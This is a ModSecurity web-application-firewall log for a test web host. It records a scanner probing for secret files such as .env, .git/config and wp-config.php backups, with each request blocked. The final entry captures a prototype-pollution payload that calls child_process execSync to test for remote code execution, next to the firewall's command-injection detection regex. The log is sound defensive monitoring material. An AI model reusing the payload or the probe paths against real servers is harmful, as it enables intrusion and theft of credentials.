[Mon Jan 26 19:22:42.755695 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXew8tvRdLOT9r0e0y90DwAAAAY"]
[Mon Jan 26 19:22:42.755877 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXew8tvRdLOT9r0e0y90DwAAAAY"]
[Mon Jan 26 19:22:42.756017 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aXew8tvRdLOT9r0e0y90DwAAAAY"]
[Mon Jan 26 19:22:42.776477 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXew8tvRdLOT9r0e0y90EAAAAAY"]
[Mon Jan 26 19:22:42.776599 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXew8tvRdLOT9r0e0y90EAAAAAY"]
[Mon Jan 26 19:22:42.776757 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXew8tvRdLOT9r0e0y90EAAAAAY"]
[Mon Jan 26 19:22:42.776893 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aXew8tvRdLOT9r0e0y90EAAAAAY"]
[Mon Jan 26 19:22:42.797342 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXew8tvRdLOT9r0e0y90EQAAAAY"]
[Mon Jan 26 19:22:42.797486 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXew8tvRdLOT9r0e0y90EQAAAAY"]
[Mon Jan 26 19:22:42.797615 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aXew8tvRdLOT9r0e0y90EQAAAAY"]
[Mon Jan 26 19:22:42.818056 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXew8tvRdLOT9r0e0y90EgAAAAY"]
[Mon Jan 26 19:22:42.818223 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXew8tvRdLOT9r0e0y90EgAAAAY"]
[Mon Jan 26 19:22:42.818366 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aXew8tvRdLOT9r0e0y90EgAAAAY"]
[Mon Jan 26 19:22:42.838935 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXew8tvRdLOT9r0e0y90EwAAAAY"]
[Mon Jan 26 19:22:42.839087 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXew8tvRdLOT9r0e0y90EwAAAAY"]
[Mon Jan 26 19:22:42.839215 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aXew8tvRdLOT9r0e0y90EwAAAAY"]
[Mon Jan 26 19:22:42.859725 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXew8tvRdLOT9r0e0y90FAAAAAY"]
[Mon Jan 26 19:22:42.859880 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXew8tvRdLOT9r0e0y90FAAAAAY"]
[Mon Jan 26 19:22:42.860019 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXew8tvRdLOT9r0e0y90FAAAAAY"]
[Mon Jan 26 19:22:42.880529 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXew8tvRdLOT9r0e0y90FQAAAAY"]
[Mon Jan 26 19:22:42.880668 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXew8tvRdLOT9r0e0y90FQAAAAY"]
[Mon Jan 26 19:22:42.880793 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aXew8tvRdLOT9r0e0y90FQAAAAY"]
[Mon Jan 26 19:22:42.901232 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew8tvRdLOT9r0e0y90FgAAAAY"]
[Mon Jan 26 19:22:42.901349 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew8tvRdLOT9r0e0y90FgAAAAY"]
[Mon Jan 26 19:22:42.901499 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew8tvRdLOT9r0e0y90FgAAAAY"]
[Mon Jan 26 19:22:42.901635 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aXew8tvRdLOT9r0e0y90FgAAAAY"]
[Mon Jan 26 19:22:42.944960 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aXew8tvRdLOT9r0e0y90GAAAAAY"]
[Mon Jan 26 19:22:42.945209 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aXew8tvRdLOT9r0e0y90GAAAAAY"]
[Mon Jan 26 19:22:42.945339 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/config.php.bak"] [unique_id "aXew8tvRdLOT9r0e0y90GAAAAAY"]
[Mon Jan 26 19:22:43.031495 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aXew89vRdLOT9r0e0y90HAAAAAY"]
[Mon Jan 26 19:22:43.031647 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aXew89vRdLOT9r0e0y90HAAAAAY"]
[Mon Jan 26 19:22:43.031780 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aXew89vRdLOT9r0e0y90HAAAAAY"]
[Mon Jan 26 19:22:43.052465 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXew89vRdLOT9r0e0y90HQAAAAY"]
[Mon Jan 26 19:22:43.052619 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXew89vRdLOT9r0e0y90HQAAAAY"]
[Mon Jan 26 19:22:43.052761 2026] [:error] [pid 1660632] [client 195.178.110.132:32910] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aXew89vRdLOT9r0e0y90HQAAAAY"]
[Mon Jan 26 21:24:15.409896 2026] [:error] [pid 1675789] [client 45.148.10.143:46714] [client 45.148.10.143] ModSecurity: Warning. Pattern match "(?:;|\\\\{|\\\\||\\\\|\\\\||&|&&|\\\\n|\\\\r|\\\\$\\\\(|\\\\$\\\\(\\\\(|`|\\\\${|<\\\\(|>\\\\(|\\\\(\\\\s*\\\\))\\\\s*(?:{|\\\\s*\\\\(\\\\s*|\\\\w+=(?:[^\\\\s]*|\\\\$.*|\\\\$.*|<.*|>.*|\\\\'.*\\\\'|\\".*\\")\\\\s+|!\\\\s*|\\\\$)*\\\\s*(?:'|\\")*(?:[\\\\?\\\\*\\\\[\\\\]\\\\(\\\\)\\\\-\\\\|+\\\\w'\\"\\\\./\\\\\\\\]+/)?[\\\\\\\\'\\"]*(?:s[\\\\\\\\'\\"]* ..." at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "160"] [id "932105"] [msg "Remote Command Execution: Unix Command Injection"] [data "Matched Data: {timeout found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))',{timeout:5000}).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2. [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aXfNb8psbZfsFdDQrpqAOwAAAAI"]
